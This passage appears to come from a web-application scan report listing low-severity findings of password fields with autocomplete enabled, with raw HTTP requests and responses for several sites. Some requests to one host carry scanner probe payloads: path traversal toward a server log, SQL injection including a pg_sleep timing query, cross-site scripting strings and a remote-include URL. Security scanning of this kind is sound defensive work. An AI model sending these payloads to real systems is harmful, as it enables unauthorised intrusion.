       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../etc/httpd/logs/error_log" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.278. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/index.cfm?nsextt=//netsparker.com/n/n.css?0x000016 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:42 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:42 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=//netsparker.com/n/n.css?0x000016" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.279. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%22%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%22 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:47 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%22%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%22" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.280. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x00000E%2529%253C%252Fscript%253E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x00000E%2529%253C%252Fscript%253E" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.281. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%27%22%20ns=%20netsparker(0x00001E)%20 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27%22%20ns=%20netsparker(0x00001E)%20" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.282. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=http://netsparker.com/n?%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=http://netsparker.com/n?%00" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.283. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%3Cscript%3Ens(0x000040)%3C/script%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%3Cscript%3Ens(0x000040)%3C/script%3E" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.284. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register='%3BSELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e3042a9b6d0213f1e43
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:08 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:08 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='%3BSELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.285. https://hourly.deploy.com/hmc/report/index.cfm/%22ns=%22netsparker(0x000042)  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm/%22ns=%22netsparker(0x000042)

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/index.cfm/%22ns=%22netsparker(0x000042) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:52 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:52 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:52 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:52 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.286. https://hourly.deploy.com/hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529)  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529)

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:55 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:55 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:55 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:55 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.287. http://mail.ru/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mail.ru
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: mail.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:24:37 GMT
Server: Apache/1.3.27 (Unix) mru_xml/0.471 gorgona/2.1 mod_jk/1.2.4 mod_ruby/1.0.7 Ruby/1.6.8 mod_mrim/0.17
Connection: close
Set-Cookie: Mpopl=721425857; expires=Mon, 25 Apr 2011 14:39:37 GMT; path=/; domain=.mail.ru
Set-Cookie: mrcu=D5824DB584250497422EF3D6C1AD; expires=Thu, 22 Apr 2021 14:24:37 GMT; path=/; domain=.mail.ru
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Sun, 25 Apr 2010 14:24:37 GMT
Last-Modified: Mon, 25 Apr 2011 18:24:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 114440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
<head
...[SNIP]...
<div class="relative z100 m">
<form name="Auth" method="post" action="http://e.mail.ru/cgi-bin/auth" style="overflow: hidden;">


<img src="http://limg.imgsmail.ru/mail/ru/images/log_bms.gif" width="226" height="18" usemap="#logbms" alt="" />
...[SNIP]...
<td><input type="password" class="long" size="15" name="Password" tabindex="5"
value="" />
</td>
...[SNIP]...

17.288. http://my.webalta.ru/public/engine/templates.js  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://my.webalta.ru
Path:   /public/engine/templates.js

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /public/engine/templates.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:27:32 GMT
Content-Type: application/x-javascript
Content-Length: 17139
Last-Modified: Tue, 27 Apr 2010 14:52:13 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:27:32 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

//
//
   // .................. ............
   function tmpl_favicon(url)
   {
       url = url.replace('http://', '') + '/';
       url = url.substr(0, url.indexOf('/'));
       var sub1 = url.substr(0, 2);
       var
...[SNIP]...
<td><form action="#" onsubmit="f_input(this); return false;" >';
       str+='E-mail:<br>
...[SNIP]...
<br><input name="pass" type="password" value="" size=20 onClick=\'this.focus();\'>';
       str+= '<br>
...[SNIP]...

17.289. http://my.webalta.ru/public/engine/templates.js  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://my.webalta.ru
Path:   /public/engine/templates.js

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /public/engine/templates.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:27:32 GMT
Content-Type: application/x-javascript
Content-Length: 17139
Last-Modified: Tue, 27 Apr 2010 14:52:13 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:27:32 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

//
//
   // .................. ............
   function tmpl_favicon(url)
   {
       url = url.replace('http://', '') + '/';
       url = url.substr(0, url.indexOf('/'));
       var sub1 = url.substr(0, 2);
       var
...[SNIP]...
<td style=\'width:50%;\'><form onsubmit="f_reg(this); return false;" >';
       str+='...................... ................... ...... ......................, ...... ........ ................ .......... .................. .. ................ .......................';        
       s
...[SNIP]...
<br><input size=20 name="pass" type="password" value="" onClick=\'this.focus();\'>';
       str+='<br>
...[SNIP]...
<br><input size=20 name="pass2" type="password" value="" onClick=\'this.focus();\'>';
       str+= '<br>
...[SNIP]...

17.290. http://odnoklassniki.ru/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://odnoklassniki.ru
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: odnoklassniki.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: CHECK_COOKIE=true; Domain=.odnoklassniki.ru; Expires=Mon, 25-Apr-2011 14:27:36 GMT; Path=/
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Rendered-Blocks: HtmlPage
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 14:26:36 GMT
Content-Length: 13753

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>..........................</title>
<meta http-equiv="Content-Type" con
...[SNIP]...
<div class="panelBox_body"><form action="http://www.odnoklassniki.ru/dk?cmd=AnonymLogin&amp;st.cmd=anonymLogin&amp;tkn=6956" method="post"><input value="" type="hidden" name="st.redirect">
...[SNIP]...
</label><input id="field_password" maxlength="" name="st.password" value="" class="fi" type="password" size="20"><div class="checkbox">
...[SNIP]...

17.291. http://pda.loveplanet.ru/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pda.loveplanet.ru
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: pda.loveplanet.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:51:44 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: domhit=1; path=/; expires=Mon, 02-May-2011 14:51:44 GMT; domain=.pda.loveplanet.ru
Set-Cookie: affiliate_reff=http%3A%2F%2Fmy.webalta.ru%2F; path=/; expires=Tue, 24-Apr-2012 14:51:44 GMT; domain=.pda.loveplanet.ru
Set-Cookie: randomhit=1698142961; path=/; expires=Tue, 24-Apr-2012 14:51:44 GMT; domain=.pda.loveplanet.ru
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 25 Apr 2011 14:51:44 GMT
Content-Length: 11125

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<title>.................... LovePlanet.ru. .......... .............. .. .........
...[SNIP]...
<div class="bl_login bg_lightgray">
       <form method="post" action="/a-logon/" name="login">
           <input type="hidden" name="a" value="logon">
...[SNIP]...
<nobr>............&nbsp;<input type="password" class="itxt" size="5" name="password" id="password"></nobr>
...[SNIP]...

17.292. http://pretty.ru/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pretty.ru
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: pretty.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:24:33 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: domhit=1; path=/; expires=Mon, 02-May-2011 14:24:33 GMT; domain=.pretty.ru
Set-Cookie: affiliate_reff=; path=/; expires=Thu, 01-Jan-1972 03:00:00 GMT; domain=.pretty.ru
Set-Cookie: randomhit=1511529011; path=/; expires=Tue, 24-Apr-2012 14:24:33 GMT; domain=.pretty.ru
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 25 Apr 2011 14:24:33 GMT
Content-Length: 59765

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8
...[SNIP]...
<td>
        <form method="post" action="/a-logon/" name="login">
<input type="hidden" name="a" value="logon">
...[SNIP]...
<input type="text" name="auid" id="auid" size="10">
            ............ <input type="password" size="10" name="password" id="password">
            <input type="submit" value=".........." class="button">
...[SNIP]...

17.293. https://system.netsuite.com/pages/customerlogin.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://system.netsuite.com
Path:   /pages/customerlogin.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /pages/customerlogin.jsp HTTP/1.1
Host: system.netsuite.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bn_u=6923519460848807096; mbox=session#1303736347554-914602#1303744342|PC#1303736347554-914602.17#1366814482|check#true#1303742542

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:14:13 GMT
Server: Apache
NS_RTIMER_COMPOSITE: 2015151527:616363742D6A6176613036392E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=661
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 49795


<!-- hosted from '/US/' on a.j69.sv running 2010.2.0.159 -->
<html>
<head>
<title>NetSuite - Customer Login</title>
<meta name="description" content="NetSuite provides a login page for
...[SNIP]...
<td width="237"><form method="post" action="https://system.netsuite.com/app/login/nllogin.nl">
<TABLE WIDTH="237" BORDER="0" CELLSPACING="0" CELLPADDING="0">
...[SNIP]...
<TD><INPUT TYPE="password" NAME="password" SIZE="30" BORDER="0" onKeyPress="if (event.keyCode == 13) {if(!checkEmpty()){return false;}document.forms[0].jsenabled.value = 'T';document.forms[0].submit(); return false; } return true;" tabindex="2"></TD>
...[SNIP]...

17.294. http://vkontakte.ru/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://vkontakte.ru
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

